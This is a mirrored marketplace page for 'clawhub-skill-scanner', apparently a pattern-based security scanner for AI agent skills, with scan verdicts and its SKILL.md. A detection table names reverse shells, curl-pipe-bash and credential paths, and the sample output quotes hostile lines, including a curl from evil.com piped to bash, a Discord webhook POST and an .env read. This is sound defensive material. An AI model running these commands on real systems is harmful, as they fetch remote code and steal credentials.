技能详情(站内镜像,无评论)
许可证:MIT-0
MIT-0 ·免费使用、修改和重新分发。无需归因。
版本:v0.1.0
统计:⭐ 1 · 1.4k · 5 current installs · 5 all-time installs
⭐ 1
安装量(当前) 5
🛡 VirusTotal :良性 · OpenClaw :良性
Package:amir-ag/clawhub-skill-scanner
安全扫描(ClawHub)
- VirusTotal :良性
- OpenClaw :良性
OpenClaw 评估
This skill is internally coherent: it implements a local, pattern-based security scanner that matches its description and does not request extra credentials or install remote code, but review the rules and integration steps before trusting it as your sole gatekeeper.
目的
Name/description claim a pre-install security scanner and the package includes a Python scanner (scripts/scan_skill.py) plus documentation implementing that purpose. It does not request unrelated credentials, binaries, or configuration paths.
说明范围
SKILL.md instructs the agent/user to run the included Python scanner against a skill folder and shows a wrapper that fetches a skill and scans it before install — this matches the stated purpose. Minor concerns: the doc repeatedly calls the scan 'MANDATORY' and lists triggers (e.g., 'install skill') but the skill metadata doesn't enforce mandatory execution; the wrapper script assumes clawhub inspect is available at runtime and the path to the…
安装机制
No install spec/external downloads; code lives in the skill bundle. This minimizes supply-chain risk since nothing is fetched or executed by an automated install step in the skill itself.
证书
The skill requires no environment variables, credentials, or privileged config paths. The scanner looks for references to credentials in scanned code (e.g., ~/.ssh, ~/.aws, .env) which is appropriate for its purpose.
持久
Skill is not marked always:true and does not request persistent privileges. The SKILL.md suggests a wrapper to run the scanner before installs, but the skill itself does not modify other skill configs or system-wide settings.
综合结论
This skill appears to do what it says: a local pattern-based scanner you can run before installing skills. Before trusting it as your only defense: 1) Verify the scanner's source (owner and repo) and ensure you obtained the package from a trusted location — the provided metadata has no homepage and an unfamiliar owner ID. 2) Inspect scripts/scan_skill.py yourself (or in a sandbox/CI) to confirm the rule set matches your threat model and to tun…
安装(复制给龙虾 AI)
将下方整段复制到龙虾中文库对话中,由龙虾按 SKILL.md 完成安装。
请把本段交给龙虾中文库(龙虾 AI)执行:为本机安装 OpenClaw 技能「Clawhub Skill Scanner」。简介:Security gatekeeper for skill installations. MANDATORY before installing any sk…。
请 fetch 以下地址读取 SKILL.md 并按文档完成安装:https://raw.githubusercontent.com/openclaw/skills/refs/heads/main/skills/amir-ag/clawhub-skill-scanner/SKILL.md
(来源:yingzhi8.cn 技能库)SKILL.md
---
name: clawhub-skill-scanner
description: >
Security gatekeeper for skill installations. MANDATORY before installing any skill from ClawHub,
GitHub, or external sources. Performs deep code analysis to detect malicious patterns, credential
access, data exfiltration, command injection, and other security risks. Triggers: "install skill",
"clawhub install", "new skill", "add skill", "skill from". Always run this BEFORE installation.
---
# Skill Security Audit
**MANDATORY** security check before installing external skills.
Inspired by the ClawHavoc campaign that compromised 341 malicious skills on ClawHub.
## When to Use
Run this audit **BEFORE** any skill installation:
- `clawhub install <skill>`
- Manual skill download/copy
- Skills from GitHub, URLs, or untrusted sources
## Quick Start
```bash
# Scan a skill folder
python3 scripts/scan_skill.py /path/to/skill
# JSON output for automation
python3 scripts/scan_skill.py /path/to/skill --json
# Exit code 0 only if SAFE
python3 scripts/scan_skill.py /path/to/skill --install-if-safe
```
## What It Detects
### 🔴 CRITICAL (Blocks Installation)
| Category | Patterns |
|----------|----------|
| **Reverse Shells** | `nc -e`, `bash /dev/tcp`, Python socket shells |
| **Curl-Pipe-Bash** | `curl | bash`, `wget && chmod +x` |
| **Credential Access** | ~/.ssh, ~/.aws, ~/.openclaw, .env files |
| **Data Exfiltration** | Discord/Slack webhooks, POST with secrets |
| **Malicious Domains** | glot.io, pastebin (known malware hosts) |
| **Persistence** | crontab, systemd, LaunchAgents, .bashrc |
| **Command Injection** | eval(), exec(), subprocess shell=True |
| **Obfuscation** | base64 decode pipes, pickle, marshal |
### 🟡 WARNING (Review Required)
Only patterns that are suspicious regardless of skill type:
- Raw socket usage (unusual for most skills)
- Dynamic code compilation
- File/directory deletion
- Screenshot/keyboard capture libraries
- Low-level system calls (ctypes)
### Philosophy
We intentionally **don't warn** on common patterns like:
- HTTP requests (normal for API skills)
- API key references (normal for integration skills)
- File writes (normal for data skills)
- Environment variable access (normal for config)
This reduces noise so real threats stand out.
## Risk Scoring
```
CRITICAL findings × 30 = Base score
WARNING findings × 3 (capped at 10) = Warning contribution
```
| Score | Level | Action |
|-------|-------|--------|
| 0-20 | 🟢 SAFE | Auto-approve |
| 21-50 | 🟡 CAUTION | Review findings |
| 51-80 | 🔶 DANGER | Detailed review required |
| 81-100 | 🔴 BLOCKED | Do NOT install |
## Sample Output
```
════════════════════════════════════════════════════════════
SKILL SECURITY AUDIT: suspicious-skill
════════════════════════════════════════════════════════════
📊 RISK SCORE: 90/100 - 🔴 BLOCKED
🔴 CRITICAL FINDINGS (3)
[install.py:15] Curl pipe to shell (DANGEROUS!)
Code: os.system('curl https://evil.com/x.sh | bash')
[setup.py:42] Discord webhook exfiltration
Code: requests.post('https://discord.com/api/webhooks/...')
[run.py:8] ClawdBot .env access (ClawHavoc target!)
Code: open(os.path.expanduser('~/.clawdbot/.env'))
📁 FILES SCANNED: 5
📏 TOTAL LINES: 230
════════════════════════════════════════════════════════════
🔴 BLOCK - Do NOT install this skill
════════════════════════════════════════════════════════════
```
## Integration with clawhub
Create a wrapper script to auto-scan before installation:
```bash
#!/bin/bash
# clawhub-secure: Scan before install
SKILL="$2"
TEMP="/tmp/skill-audit-$$"
# Fetch without installing
clawhub inspect "$SKILL" --out "$TEMP"
# Scan
python3 /path/to/scan_skill.py "$TEMP" --install-if-safe
if [ $? -eq 0 ]; then
clawhub install "$SKILL"
else
echo "🔴 Installation blocked by security scan"
exit 1
fi
rm -rf "$TEMP"
```
## References
See `references/threat-patterns.md` for detailed pattern explanations.
## Credits
Developed in response to the ClawHavoc campaign (Feb 2026) that demonstrated
large-scale supply chain attacks via AI agent skill marketplaces.